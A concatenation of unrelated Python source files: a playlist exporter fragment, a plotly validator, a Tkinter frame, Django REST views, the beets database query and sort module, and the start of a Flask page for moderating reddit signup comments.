if export_thumbs_up:
    # get thumbs up playlist
    thumbs_up_tracks = []
    for track in library:
        # a rating greater than 1 counts as a thumbs-up
        if track.get('rating') is not None and int(track.get('rating')) > 1:
            thumbs_up_tracks.append(track)


    # modify format of each dictionary to match the data type
    # of the other playlists
    thumbs_up_tracks_formatted = []
    for t in thumbs_up_tracks:
        thumbs_up_tracks_formatted.append({'track': t})

    playlist_handler('Thumbs up', 'Thumbs up tracks', thumbs_up_tracks_formatted)

# optionally export the whole library as a single "All" playlist
if export_all:
    all_tracks_formatted = []
    for t in library:
        all_tracks_formatted.append({'track': t})

    playlist_handler('All', 'All tracks', all_tracks_formatted)

close_api()
    

import _plotly_utils.basevalidators


class ShowexponentValidator(_plotly_utils.basevalidators.EnumeratedValidator):
    """Enumerated validator for scatterpolar.marker.colorbar.showexponent."""

    def __init__(self,
                 plotly_name="showexponent",
                 parent_name="scatterpolar.marker.colorbar",
                 **kwargs):
        # Callers may override the edit type and the permitted values.
        edit_type = kwargs.pop("edit_type", "colorbars")
        values = kwargs.pop("values", ["all", "first", "last", "none"])
        super(ShowexponentValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type=edit_type,
            values=values,
            **kwargs
        )

__author__ = 'miko'
from Tkinter import Frame


class GameState(Frame):
	"""A gold-coloured frame that fills its parent's main window.

	Expects the parent object as the first positional argument and the
	required keyword arguments ``stateName`` and ``id``.
	"""
	def __init__(self, *args, **kwargs):
		# Required kwargs: raises KeyError when either is missing.
		self.stateName = kwargs["stateName"]
		# args[0] must expose a `mainWindow` Tk container.
		self.root = args[0]
		self.id = kwargs["id"]
		Frame.__init__(self, self.root.mainWindow)
		self.config(
			background="gold"
		)
		# Stretch to cover the whole parent window.
		self.place(relwidth=1, relheight=1)

from csacompendium.csa_practice.models import PracticeLevel
from csacompendium.utils.pagination import APILimitOffsetPagination
from csacompendium.utils.permissions import IsOwnerOrReadOnly
from csacompendium.utils.viewsutils import DetailViewUpdateDelete, CreateAPIViewHook
from rest_framework.filters import DjangoFilterBackend
from rest_framework.generics import CreateAPIView, ListAPIView
from rest_framework.permissions import IsAuthenticated, IsAdminUser
from .filters import PracticeLevelListFilter
from csacompendium.csa_practice.api.practicelevel.practicelevelserializers import practice_level_serializers


def practice_level_views():
    """
    Practice level views
    :return: All practice level views
    :rtype: Object
    """
    # Serializers are resolved once and shared by the view classes below.
    practice_level_serializer = practice_level_serializers()

    class PracticeLevelCreateAPIView(CreateAPIViewHook):
        """
        Creates a single record.
        """
        queryset = PracticeLevel.objects.all()
        serializer_class = practice_level_serializer['PracticeLevelDetailSerializer']
        # Any authenticated user may create records.
        permission_classes = [IsAuthenticated]

    class PracticeLevelListAPIView(ListAPIView):
        """
        API list view. Gets all records API.
        """
        queryset = PracticeLevel.objects.all()
        serializer_class = practice_level_serializer['PracticeLevelListSerializer']
        filter_backends = (DjangoFilterBackend,)
        filter_class = PracticeLevelListFilter
        pagination_class = APILimitOffsetPagination

    class PracticeLevelDetailAPIView(DetailViewUpdateDelete):
        """
        Updates a record.
        """
        queryset = PracticeLevel.objects.all()
        serializer_class = practice_level_serializer['PracticeLevelDetailSerializer']
        # Update/delete is restricted to authenticated admin users.
        permission_classes = [IsAuthenticated, IsAdminUser]
        # Records are addressed by slug rather than primary key.
        lookup_field = 'slug'

    return {
        'PracticeLevelListAPIView': PracticeLevelListAPIView,
        'PracticeLevelDetailAPIView': PracticeLevelDetailAPIView,
        'PracticeLevelCreateAPIView': PracticeLevelCreateAPIView
    }

# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.

"""The Query type hierarchy for DBCore.
"""

import re
from operator import mul
from beets import util
from datetime import datetime, timedelta
import unicodedata
from functools import reduce


class ParsingError(ValueError):
    """Abstract base class for errors raised while parsing a
    user-requested album/query specification.
    """


class InvalidQueryError(ParsingError):
    """Represent any kind of invalid query.

    The query should be a unicode string or a list, which will be space-joined.
    """

    def __init__(self, query, explanation):
        if isinstance(query, list):
            query = " ".join(query)
        super().__init__(f"'{query}': {explanation}")


class InvalidQueryArgumentValueError(ParsingError):
    """Represent a query argument that could not be converted as expected.

    It exists to be caught in upper stack levels so a meaningful (i.e. with the
    query) InvalidQueryError can be raised.
    """

    def __init__(self, what, expected, detail=None):
        # The optional detail is appended only when it is truthy.
        suffix = f": {detail}" if detail else ""
        super().__init__(f"'{what}' is not {expected}{suffix}")


class Query:
    """Abstract base class for a query against the item database."""

    def clause(self):
        """Generate an SQLite expression implementing the query.

        Return (clause, subvals) where clause is a valid sqlite
        WHERE clause implementing the query and subvals is a list of
        items to be substituted for ?s in the clause.
        """
        return (None, ())

    def match(self, item):
        """Check whether this query matches a given Item. Can be used to
        perform queries on arbitrary sets of Items.
        """
        raise NotImplementedError

    def __repr__(self):
        return "{}()".format(type(self).__name__)

    def __eq__(self, other):
        # Base queries carry no state; equality is type identity.
        return type(other) == type(self)

    def __hash__(self):
        return 0


class FieldQuery(Query):
    """An abstract query that matches a pattern against one named field.

    Subclasses must provide a `value_match` class method deciding whether
    a pattern string matches a value string, and may provide `col_clause`
    to implement the same matching in SQLite.
    """

    def __init__(self, field, pattern, fast=True):
        self.field = field
        self.pattern = pattern
        self.fast = fast

    def col_clause(self):
        return None, ()

    def clause(self):
        # Slow (flexattr) queries cannot be expressed in SQL; fall back
        # to Python-side matching via match().
        return self.col_clause() if self.fast else (None, ())

    @classmethod
    def value_match(cls, pattern, value):
        """Determine whether the value matches the pattern. Both
        arguments are strings.
        """
        raise NotImplementedError()

    def match(self, item):
        return self.value_match(self.pattern, item.get(self.field))

    def __repr__(self):
        return (f"{self.__class__.__name__}({self.field!r}, "
                f"{self.pattern!r}, {self.fast})")

    def __eq__(self, other):
        if not super().__eq__(other):
            return False
        return self.field == other.field and self.pattern == other.pattern

    def __hash__(self):
        return hash((self.field, hash(self.pattern)))


class MatchQuery(FieldQuery):
    """A query that looks for exact matches in an item field."""

    def col_clause(self):
        return f"{self.field} = ?", [self.pattern]

    @classmethod
    def value_match(cls, pattern, value):
        return value == pattern


class NoneQuery(FieldQuery):
    """A query that checks whether a field is null."""

    def __init__(self, field, fast=True):
        super().__init__(field, None, fast)

    def col_clause(self):
        return f"{self.field} IS NULL", ()

    def match(self, item):
        return item.get(self.field) is None

    def __repr__(self):
        return f"{self.__class__.__name__}({self.field!r}, {self.fast})"


class StringFieldQuery(FieldQuery):
    """A FieldQuery that converts values to strings before matching
    them.
    """

    @classmethod
    def value_match(cls, pattern, value):
        """Determine whether the value matches the pattern. The value
        may have any type.
        """
        text = util.as_string(value)
        return cls.string_match(pattern, text)

    @classmethod
    def string_match(cls, pattern, value):
        """Determine whether the value matches the pattern. Both
        arguments are strings. Subclasses implement this method.
        """
        raise NotImplementedError()


class StringQuery(StringFieldQuery):
    """A query that matches a whole string in a specific item field."""

    def col_clause(self):
        # Escape the escape character first, then the LIKE wildcards, so
        # the pattern is matched literally.
        escaped = self.pattern
        for char in ('\\', '%', '_'):
            escaped = escaped.replace(char, '\\' + char)
        return self.field + " like ? escape '\\'", [escaped]

    @classmethod
    def string_match(cls, pattern, value):
        return pattern.lower() == value.lower()


class SubstringQuery(StringFieldQuery):
    """A query that matches a substring in a specific item field."""

    def col_clause(self):
        # Escape the escape character first, then the LIKE wildcards,
        # before wrapping the pattern in % for substring matching.
        escaped = self.pattern
        for char in ('\\', '%', '_'):
            escaped = escaped.replace(char, '\\' + char)
        subvals = ['%' + escaped + '%']
        return self.field + " like ? escape '\\'", subvals

    @classmethod
    def string_match(cls, pattern, value):
        return pattern.lower() in value.lower()


class RegexpQuery(StringFieldQuery):
    """A query that matches a regular expression in a specific item
    field.

    Raises InvalidQueryArgumentValueError when the pattern is not a valid
    regular expression.
    """

    def __init__(self, field, pattern, fast=True):
        super().__init__(field, pattern, fast)
        # Normalize before compiling so the pattern and the (normalized)
        # matched values agree on their Unicode representation.  Bug fix:
        # the previous code compiled the un-normalized `self.pattern`,
        # so a pattern in decomposed form could never match a value that
        # string_match() normalizes to NFC.
        pattern = self._normalize(pattern)
        try:
            self.pattern = re.compile(pattern)
        except re.error as exc:
            # Invalid regular expression.
            raise InvalidQueryArgumentValueError(pattern,
                                                 "a regular expression",
                                                 format(exc))

    @staticmethod
    def _normalize(s):
        """Normalize a Unicode string's representation (used on both
        patterns and matched values).
        """
        return unicodedata.normalize('NFC', s)

    @classmethod
    def string_match(cls, pattern, value):
        return pattern.search(cls._normalize(value)) is not None


class BooleanQuery(MatchQuery):
    """Matches a boolean field. Pattern should either be a boolean or a
    string reflecting a boolean.
    """

    def __init__(self, field, pattern, fast=True):
        super().__init__(field, pattern, fast)
        # Accept textual booleans and store the pattern as 0/1, matching
        # SQLite's integer representation of booleans.
        value = self.pattern
        if isinstance(value, str):
            value = util.str2bool(value)
        self.pattern = int(value)


class BytesQuery(MatchQuery):
    """Match a raw bytes field (i.e., a path). This is a necessary hack
    to work around the `sqlite3` module's desire to treat `bytes` and
    `unicode` equivalently in Python 2. Always use this query instead of
    `MatchQuery` when matching on BLOB values.
    """

    def __init__(self, field, pattern):
        super().__init__(field, pattern)

        # Keep two views of the pattern: `pattern` as bytes for
        # Python-side comparisons and `buf_pattern` as a memoryview so
        # SQLite treats the value as a binary blob rather than encoded
        # Unicode text.
        if isinstance(self.pattern, memoryview):
            self.buf_pattern = self.pattern
            self.pattern = bytes(self.pattern)
        elif isinstance(self.pattern, (str, bytes)):
            if isinstance(self.pattern, str):
                self.pattern = self.pattern.encode('utf-8')
            self.buf_pattern = memoryview(self.pattern)

    def col_clause(self):
        return f"{self.field} = ?", [self.buf_pattern]


class NumericQuery(FieldQuery):
    """Matches numeric fields. A syntax using Ruby-style range ellipses
    (``..``) lets users specify one- or two-sided ranges. For example,
    ``year:2001..`` finds music released since the turn of the century.

    Raises InvalidQueryArgumentValueError when the pattern does not
    represent an int or a float.
    """

    def _convert(self, s):
        """Convert a string to an int or, failing that, a float.

        Return None if `s` is empty.
        Raise an InvalidQueryArgumentValueError if the string cannot be
        converted.
        """
        # This is really just a bit of fun premature optimization.
        if not s:
            return None
        try:
            return int(s)
        except ValueError:
            try:
                return float(s)
            except ValueError:
                raise InvalidQueryArgumentValueError(s, "an int or a float")

    def __init__(self, field, pattern, fast=True):
        super().__init__(field, pattern, fast)

        parts = pattern.split('..', 1)
        if len(parts) == 1:
            # A single point rather than a range.
            self.point = self._convert(parts[0])
            self.rangemin = None
            self.rangemax = None
        else:
            # One- or two-sided range.
            self.point = None
            self.rangemin = self._convert(parts[0])
            self.rangemax = self._convert(parts[1])

    def match(self, item):
        if self.field not in item:
            return False
        value = item[self.field]
        if isinstance(value, str):
            value = self._convert(value)

        if self.point is not None:
            return value == self.point

        # Range query: each missing bound is unbounded.
        if self.rangemin is not None and value < self.rangemin:
            return False
        if self.rangemax is not None and value > self.rangemax:
            return False
        return True

    def col_clause(self):
        if self.point is not None:
            return f'{self.field}=?', (self.point,)

        if self.rangemin is not None and self.rangemax is not None:
            return ('{0} >= ? AND {0} <= ?'.format(self.field),
                    (self.rangemin, self.rangemax))
        if self.rangemin is not None:
            return f'{self.field} >= ?', (self.rangemin,)
        if self.rangemax is not None:
            return f'{self.field} <= ?', (self.rangemax,)
        return '1', ()


class CollectionQuery(Query):
    """An abstract query class that aggregates other queries. Can be
    indexed like a list to access the sub-queries.
    """

    def __init__(self, subqueries=()):
        self.subqueries = subqueries

    # Sequence protocol, delegated to the subquery container.

    def __len__(self):
        return len(self.subqueries)

    def __getitem__(self, key):
        return self.subqueries[key]

    def __iter__(self):
        return iter(self.subqueries)

    def __contains__(self, item):
        return item in self.subqueries

    def clause_with_joiner(self, joiner):
        """Return a clause created by joining together the clauses of
        all subqueries with the string joiner (padded by spaces).
        """
        clause_parts = []
        subvals = []
        for subquery in self.subqueries:
            clause, values = subquery.clause()
            if not clause:
                # One subquery is Python-only, so the whole collection
                # must fall back to the slow path.
                return None, ()
            clause_parts.append(f'({clause})')
            subvals.extend(values)
        return f' {joiner} '.join(clause_parts), subvals

    def __repr__(self):
        return f"{self.__class__.__name__}({self.subqueries!r})"

    def __eq__(self, other):
        return super().__eq__(other) and self.subqueries == other.subqueries

    def __hash__(self):
        """Since subqueries are mutable, this object should not be hashable.
        However and for conveniences purposes, it can be hashed.
        """
        result = 1
        for subquery in self.subqueries:
            result *= hash(subquery)
        return result


class AnyFieldQuery(CollectionQuery):
    """A query that matches if a given FieldQuery subclass matches in
    any field. The individual field query class is provided to the
    constructor.
    """

    def __init__(self, pattern, fields, cls):
        self.pattern = pattern
        self.fields = fields
        self.query_class = cls
        # One fast subquery per field, all sharing the same pattern.
        super().__init__([cls(field, pattern, True) for field in fields])

    def clause(self):
        return self.clause_with_joiner('or')

    def match(self, item):
        return any(subquery.match(item) for subquery in self.subqueries)

    def __repr__(self):
        return (f"{self.__class__.__name__}({self.pattern!r}, "
                f"{self.fields!r}, {self.query_class.__name__})")

    def __eq__(self, other):
        return super().__eq__(other) and self.query_class == other.query_class

    def __hash__(self):
        return hash((self.pattern, tuple(self.fields), self.query_class))


class MutableCollectionQuery(CollectionQuery):
    """A collection query whose subqueries may be modified after the
    query is initialized.
    """

    # Mutable-sequence protocol: in-place replacement and deletion of
    # subqueries (requires `subqueries` to be a mutable sequence).

    def __setitem__(self, key, value):
        self.subqueries[key] = value

    def __delitem__(self, key):
        del self.subqueries[key]


class AndQuery(MutableCollectionQuery):
    """A conjunction of a list of other queries."""

    def clause(self):
        return self.clause_with_joiner('and')

    def match(self, item):
        # Vacuously true when there are no subqueries.
        for subquery in self.subqueries:
            if not subquery.match(item):
                return False
        return True


class OrQuery(MutableCollectionQuery):
    """A disjunction of a list of other queries."""

    def clause(self):
        return self.clause_with_joiner('or')

    def match(self, item):
        # Vacuously false when there are no subqueries.
        for subquery in self.subqueries:
            if subquery.match(item):
                return True
        return False


class NotQuery(Query):
    """A query that matches the negation of its `subquery`, as a shortcut
    for performing `not(subquery)` without using regular expressions.
    """

    def __init__(self, subquery):
        self.subquery = subquery

    def clause(self):
        clause, subvals = self.subquery.clause()
        if not clause:
            # If there is no clause, there is nothing to negate. All the
            # logic is handled by match() for slow queries.
            return clause, subvals
        return f'not ({clause})', subvals

    def match(self, item):
        return not self.subquery.match(item)

    def __repr__(self):
        return f"{self.__class__.__name__}({self.subquery!r})"

    def __eq__(self, other):
        return super().__eq__(other) and self.subquery == other.subquery

    def __hash__(self):
        return hash(('not', hash(self.subquery)))


class TrueQuery(Query):
    """A query that always matches."""

    def clause(self):
        # SQLite treats the literal 1 as an always-true WHERE clause.
        return '1', ()

    def match(self, item):
        return True


class FalseQuery(Query):
    """A query that never matches."""

    def clause(self):
        # SQLite treats the literal 0 as an always-false WHERE clause.
        return '0', ()

    def match(self, item):
        return False


# Time/date queries.

def _to_epoch_time(date):
    """Convert a `datetime` object to an integer number of seconds since
    the (local) Unix epoch.
    """
    if hasattr(date, 'timestamp'):
        # The `timestamp` method exists on Python 3.3+.
        return int(date.timestamp())
    else:
        epoch = datetime.fromtimestamp(0)
        delta = date - epoch
        return int(delta.total_seconds())


def _parse_periods(pattern):
    """Parse a string containing two dates separated by two dots (..).
    Return a pair of `Period` objects.
    """
    start_part, separator, end_part = pattern.partition('..')
    if not separator:
        # No ".." present: the single date serves as both endpoints.
        instant = Period.parse(start_part)
        return (instant, instant)
    return (Period.parse(start_part), Period.parse(end_part))


class Period:
    """A period of time given by a date, time and precision.

    Example: 2014-01-01 10:50:30 with precision 'month' represents all
    instants of time during January 2014.
    """

    precisions = ('year', 'month', 'day', 'hour', 'minute', 'second')
    # strptime formats per precision; from "hour" down, both the
    # "T"-separated and the space-separated variants are accepted.
    date_formats = (
        ('%Y',),  # year
        ('%Y-%m',),  # month
        ('%Y-%m-%d',),  # day
        ('%Y-%m-%dT%H', '%Y-%m-%d %H'),  # hour
        ('%Y-%m-%dT%H:%M', '%Y-%m-%d %H:%M'),  # minute
        ('%Y-%m-%dT%H:%M:%S', '%Y-%m-%d %H:%M:%S')  # second
    )
    # Days represented by each relative unit: a "month" is exactly 30
    # days and a "year" exactly 365 days, by design.
    relative_units = {'y': 365, 'm': 30, 'w': 7, 'd': 1}
    # BUG FIX: the character classes were originally written `[+|-]`
    # and `[y|m|w|d]`.  Inside a character class `|` is a literal, so
    # '|' was accepted as a sign (silently meaning "future") and as a
    # unit (crashing with a KeyError on `relative_units['|']`).
    relative_re = '(?P<sign>[+-]?)(?P<quantity>[0-9]+)' + \
        '(?P<timespan>[ymwd])'

    def __init__(self, date, precision):
        """Create a period with the given date (a `datetime` object) and
        precision (a string, one of "year", "month", "day", "hour",
        "minute", or "second").

        Raise ValueError for an unknown precision.
        """
        if precision not in Period.precisions:
            raise ValueError(f'Invalid precision {precision}')
        self.date = date
        self.precision = precision

    @classmethod
    def parse(cls, string):
        """Parse a date and return a `Period` object or `None` if the
        string is empty, or raise an InvalidQueryArgumentValueError if
        the string cannot be parsed to a date.

        The date may be absolute or relative. Absolute dates look like
        `YYYY`, or `YYYY-MM-DD`, or `YYYY-MM-DD HH:MM:SS`, etc. Relative
        dates have three parts:

        - Optionally, a ``+`` or ``-`` sign indicating the future or the
          past. The default is the future.
        - A number: how much to add or subtract.
        - A letter indicating the unit: days, weeks, months or years
          (``d``, ``w``, ``m`` or ``y``). A "month" is exactly 30 days
          and a "year" is exactly 365 days.
        """

        def find_date_and_format(string):
            # Try formats from coarsest to finest; the index of the
            # matching entry doubles as the precision ordinal.
            # (Renamed from `ord`/`format`, which shadowed builtins.)
            for ordinal, formats in enumerate(cls.date_formats):
                for format_option in formats:
                    try:
                        date = datetime.strptime(string, format_option)
                        return date, ordinal
                    except ValueError:
                        # Parsing failed; try the next format.
                        pass
            return (None, None)

        if not string:
            return None

        # Check for a relative date.
        match_dq = re.match(cls.relative_re, string)
        if match_dq:
            sign = match_dq.group('sign')
            quantity = match_dq.group('quantity')
            timespan = match_dq.group('timespan')

            # Add or subtract the given amount of time from the current
            # date.
            multiplier = -1 if sign == '-' else 1
            days = cls.relative_units[timespan]
            date = datetime.now() + \
                timedelta(days=int(quantity) * days) * multiplier
            # Relative dates are always precise to the second.
            return cls(date, cls.precisions[5])

        # Check for an absolute date.
        date, ordinal = find_date_and_format(string)
        if date is None:
            raise InvalidQueryArgumentValueError(string,
                                                 'a valid date/time string')
        precision = cls.precisions[ordinal]
        return cls(date, precision)

    def open_right_endpoint(self):
        """Based on the precision, convert the period to a precise
        `datetime` for use as a right endpoint in a right-open interval.

        Raise ValueError for an unhandled precision.
        """
        precision = self.precision
        date = self.date
        if 'year' == self.precision:
            return date.replace(year=date.year + 1, month=1)
        elif 'month' == precision:
            if (date.month < 12):
                return date.replace(month=date.month + 1)
            else:
                # December rolls over into January of the next year.
                return date.replace(year=date.year + 1, month=1)
        elif 'day' == precision:
            return date + timedelta(days=1)
        elif 'hour' == precision:
            return date + timedelta(hours=1)
        elif 'minute' == precision:
            return date + timedelta(minutes=1)
        elif 'second' == precision:
            return date + timedelta(seconds=1)
        else:
            raise ValueError(f'unhandled precision {precision}')


class DateInterval:
    """A closed-open interval of dates.

    A left endpoint of None means since the beginning of time.
    A right endpoint of None means towards infinity.
    """

    def __init__(self, start, end):
        # An interval with both endpoints present must be non-empty.
        bounded = start is not None and end is not None
        if bounded and not start < end:
            raise ValueError("start date {} is not before end date {}"
                             .format(start, end))
        self.start = start
        self.end = end

    @classmethod
    def from_periods(cls, start, end):
        """Create an interval with two Periods as the endpoints."""
        left = None if start is None else start.date
        right = None if end is None else end.open_right_endpoint()
        return cls(left, right)

    def contains(self, date):
        before_start = self.start is not None and date < self.start
        at_or_past_end = self.end is not None and date >= self.end
        return not (before_start or at_or_past_end)

    def __str__(self):
        return f'[{self.start}, {self.end})'


class DateQuery(FieldQuery):
    """Matches date fields stored as seconds since Unix epoch time.

    Dates can be specified as ``year-month-day`` strings where only year
    is mandatory.

    The value of a date field can be matched against a date interval by
    using an ellipsis interval syntax similar to that of NumericQuery.
    """

    def __init__(self, field, pattern, fast=True):
        super().__init__(field, pattern, fast)
        self.interval = DateInterval.from_periods(*_parse_periods(pattern))

    def match(self, item):
        if self.field not in item:
            return False
        moment = datetime.fromtimestamp(float(item[self.field]))
        return self.interval.contains(moment)

    _clause_tmpl = "{0} {1} ?"

    def col_clause(self):
        clause_parts = []
        subvals = []

        # One comparison per present endpoint: closed on the left,
        # open on the right.
        for endpoint, operator in ((self.interval.start, ">="),
                                   (self.interval.end, "<")):
            if endpoint:
                clause_parts.append(
                    self._clause_tmpl.format(self.field, operator))
                subvals.append(_to_epoch_time(endpoint))

        if not clause_parts:
            # Unbounded on both sides: match any date.
            return '1', subvals
        return ' AND '.join(clause_parts), subvals


class DurationQuery(NumericQuery):
    """A NumericQuery that also accepts human-friendly (M:SS) time
    interval formats.

    Converts the range(s) to a float value and delegates to
    NumericQuery.

    Raises InvalidQueryError when the pattern represents neither an
    int, a float, nor a M:SS time interval.
    """

    def _convert(self, s):
        """Convert a M:SS or numeric string to a float.

        Return None if `s` is empty.
        Raise an InvalidQueryError if the string cannot be converted.
        """
        if not s:
            return None
        # Prefer the M:SS interpretation; fall back to a plain float.
        for converter in (util.raw_seconds_short, float):
            try:
                return converter(s)
            except ValueError:
                continue
        raise InvalidQueryArgumentValueError(
            s,
            "a M:SS string or a float")


# Sorting.

class Sort:
    """Base class for sort operations applied to item-database queries."""

    def order_clause(self):
        """Return a SQL fragment for an ORDER BY clause, or None when
        the sort cannot be expressed in SQL (i.e., this is a slow sort).
        """
        return None

    def sort(self, items):
        """Return `items` as a list in this sort's order; the default
        uses the objects' natural ordering.
        """
        return sorted(items)

    def is_slow(self):
        """Report whether this sort is *slow*: it cannot be executed in
        SQL and must run in Python.
        """
        return False

    def __eq__(self, other):
        return type(self) == type(other)

    def __hash__(self):
        return 0


class MultipleSort(Sort):
    """A sort that chains several sub-sorts together."""

    def __init__(self, sorts=None):
        self.sorts = sorts or []

    def add_sort(self, sort):
        self.sorts.append(sort)

    def _sql_sorts(self):
        """Return the longest suffix of `self.sorts` that can run in SQL.

        Only a contiguous suffix of fast (SQL-capable) sub-sorts may be
        delegated to SQL; anything before a slow sort must be applied in
        Python even when it would be fast on its own.
        """
        suffix = []
        for candidate in reversed(self.sorts):
            if candidate.order_clause() is None:
                break
            suffix.append(candidate)
        suffix.reverse()
        return suffix

    def order_clause(self):
        return ", ".join(s.order_clause() for s in self._sql_sorts())

    def is_slow(self):
        return any(s.is_slow() for s in self.sorts)

    def sort(self, items):
        # Collect, scanning from the end, every sub-sort at or before
        # the first slow one; those must run in Python.  They are kept
        # in reverse order so that stable sorting applies the most
        # significant key last.
        python_sorts = []
        past_slow = False
        for candidate in reversed(self.sorts):
            if past_slow:
                python_sorts.append(candidate)
            elif candidate.order_clause() is None:
                past_slow = True
                python_sorts.append(candidate)

        for sub_sort in python_sorts:
            items = sub_sort.sort(items)
        return items

    def __repr__(self):
        return f'MultipleSort({self.sorts!r})'

    def __hash__(self):
        return hash(tuple(self.sorts))

    def __eq__(self, other):
        return super().__eq__(other) and self.sorts == other.sorts


class FieldSort(Sort):
    """An abstract sort criterion that orders by a specific field (of
    any kind).
    """

    def __init__(self, field, ascending=True, case_insensitive=True):
        self.field = field
        self.ascending = ascending
        self.case_insensitive = case_insensitive

    def sort(self, objs):
        # TODO: Conversion and null-detection here. In Python 3,
        # comparisons with None fail. We should also support flexible
        # attributes with different types without falling over.

        def sort_key(obj):
            value = obj.get(self.field, '')
            if self.case_insensitive and isinstance(value, str):
                return value.lower()
            return value

        return sorted(objs, key=sort_key, reverse=not self.ascending)

    def __repr__(self):
        direction = '+' if self.ascending else '-'
        return '<{}: {}{}>'.format(type(self).__name__, self.field,
                                   direction)

    def __hash__(self):
        return hash((self.field, self.ascending))

    def __eq__(self, other):
        return super().__eq__(other) and \
            self.field == other.field and \
            self.ascending == other.ascending


class FixedFieldSort(FieldSort):
    """Sort object to sort on a fixed field."""

    def order_clause(self):
        direction = "ASC" if self.ascending else "DESC"
        if not self.case_insensitive:
            return f"{self.field} {direction}"
        # Lowercase text-like values in SQL so the ordering matches the
        # case-insensitive Python sort.
        folded = '(CASE ' \
                 'WHEN TYPEOF({0})="text" THEN LOWER({0}) ' \
                 'WHEN TYPEOF({0})="blob" THEN LOWER({0}) ' \
                 'ELSE {0} END)'.format(self.field)
        return f"{folded} {direction}"


class SlowFieldSort(FieldSort):
    """A sort criterion by some model field other than a fixed field:
    i.e., a computed or flexible field.
    """

    def is_slow(self):
        # Computed/flexible fields are not database columns, so this
        # sort can never be pushed down to SQL.
        return True


class NullSort(Sort):
    """No sorting. Leave results unsorted."""

    def sort(self, items):
        return items

    def __bool__(self):
        return False

    # Python 2 compatibility alias for truthiness.
    def __nonzero__(self):
        return self.__bool__()

    def __eq__(self, other):
        # A NullSort also counts as equal to "no sort at all" (None).
        return type(self) == type(other) or other is None

    def __hash__(self):
        return 0

#!/usr/bin/env python

import subprocess
import praw
from hashlib import sha1
from flask import Flask
from flask import Response
from flask import request
from cStringIO import StringIO
from base64 import b64encode
from base64 import b64decode
from ConfigParser import ConfigParser
import OAuth2Util
import os
import markdown
import bleach
# encoding=utf8
import sys
from participantCollection import ParticipantCollection

# Python 2 only: force the default string encoding to UTF-8 so that
# implicit str/unicode conversions of comment text do not raise.
reload(sys)
sys.setdefaultencoding('utf8')


# Edit Me!
# Each day after you post a signup post, copy its 6-character ID to this array.
signupPageSubmissionIds = [ '7zrrj1', '7zxkpq', '8055hn', '80ddrf', '80nbm1', '80waq3' ]
# Local port on which the moderation web UI listens.
flaskport = 8993

app = Flask(__name__)
# Debug mode is on; this server is only meant to run on localhost.
app.debug = True
# Maps sha1 hex digests to praw Comment objects; rebuilt on each page render.
commentHashesAndComments = {}

def loginAndReturnRedditSession():
    """Log in to reddit with the username/password credentials stored
    in a local config file and return the praw session.
    """
    # TODO:  password auth is going away, and we will soon need to do oauth.
    credentials = ConfigParser()
    credentials.read("../reddit-password-credentials.cfg")
    session = praw.Reddit(user_agent='Test Script by /u/foobarbazblarg')
    session.login(credentials.get("Reddit", "user"),
                  credentials.get("Reddit", "password"),
                  disable_warning=True)
    return session


def loginOAuthAndReturnRedditSession():
    """Return a praw session.

    Modern praw handles OAuth internally (reddit now requires it), so
    no explicit OAuth2Util setup or token refresh is needed here.
    """
    return praw.Reddit(user_agent='Test Script by /u/foobarbazblarg')


def getSubmissionsForRedditSession(redditSession):
    """Fetch each configured signup submission and fully expand its
    comment tree before returning the list.
    """
    submissions = [redditSession.submission(id=submissionId)
                   for submissionId in signupPageSubmissionIds]
    for submission in submissions:
        # Resolve every "MoreComments" placeholder up front.
        submission.comments.replace_more(limit=None)
    return submissions


def getCommentsForSubmissions(submissions):
    """Return a flat list of the actual Comment objects across all
    given submissions (placeholders are filtered out).
    """
    comments = []
    for submission in submissions:
        for comment in submission.comments.list():
            if comment.__class__ == praw.models.Comment:
                comments.append(comment)
    return comments


def retireCommentHash(commentHash):
    """Append `commentHash` to the retired-hashes file so the comment
    is never offered for moderation again.
    """
    with open("retiredcommenthashes.txt", "a") as retiredFile:
        retiredFile.write(commentHash + '\n')


def retiredCommentHashes():
    """Return the list of already-handled comment hashes, one per line
    of the retired-hashes file.
    """
    with open("retiredcommenthashes.txt", "r") as retiredFile:
        return retiredFile.read().splitlines()


@app.route('/moderatesignups.html')
def moderatesignups():
    """Render the moderation page: every not-yet-retired signup comment
    across the configured submissions, each with action buttons that
    post to /takeaction.html.
    """
    # Rebuild the hash->comment map from scratch each render; the
    # takeaction handler looks comments up in it.
    global commentHashesAndComments
    commentHashesAndComments = {}
    stringio = StringIO()
    stringio.write('<html>\n<head>\n</head>\n\n')

    # redditSession = loginAndReturnRedditSession()
    redditSession = loginOAuthAndReturnRedditSession()
    submissions = getSubmissionsForRedditSession(redditSession)
    flat_comments = getCommentsForSubmissions(submissions)
    retiredHashes = retiredCommentHashes()
    i = 1
    # Action forms target this hidden iframe so the page is not replaced.
    stringio.write('<iframe name="invisibleiframe" style="display:none;"></iframe>\n')
    stringio.write("<h3>")
    stringio.write(os.getcwd())
    stringio.write("<br>\n")
    for submission in submissions:
        stringio.write(submission.title)
        stringio.write("<br>\n")
    stringio.write("</h3>\n\n")
    stringio.write('<form action="copydisplayduringsignuptoclipboard.html" method="post" target="invisibleiframe">')
    stringio.write('<input type="submit" value="Copy display-during-signup.py stdout to clipboard">')
    stringio.write('</form>')
    for comment in flat_comments:
        # print comment.is_root
        # print comment.score
        i += 1
        # Identify a comment by the sha1 of its fullname plus body, so
        # an edited comment reappears for re-moderation.
        commentHash = sha1()
        commentHash.update(comment.fullname)
        commentHash.update(comment.body.encode('utf-8'))
        commentHash = commentHash.hexdigest()
        if commentHash not in retiredHashes:
            commentHashesAndComments[commentHash] = comment
            authorName = str(comment.author)  # can be None if author was deleted.  So check for that and skip if it's None.
            stringio.write("<hr>\n")
            stringio.write('<font color="blue"><b>')
            stringio.write(authorName)  # can be None if author was deleted.  So check for that and skip if it's None.
            stringio.write('</b></font><br>')
            if ParticipantCollection().hasParticipantNamed(authorName):
                stringio.write(' <small><font color="green">(member)</font></small>')
                # if ParticipantCollection().participantNamed(authorName).isStillIn:
                #    stringio.write(' <small><font color="green">(in)</font></small>')
                # else:
                #    stringio.write(' <small><font color="red">(out)</font></small>')
            else:
                stringio.write(' <small><font color="red">(not a member)</font></small>')
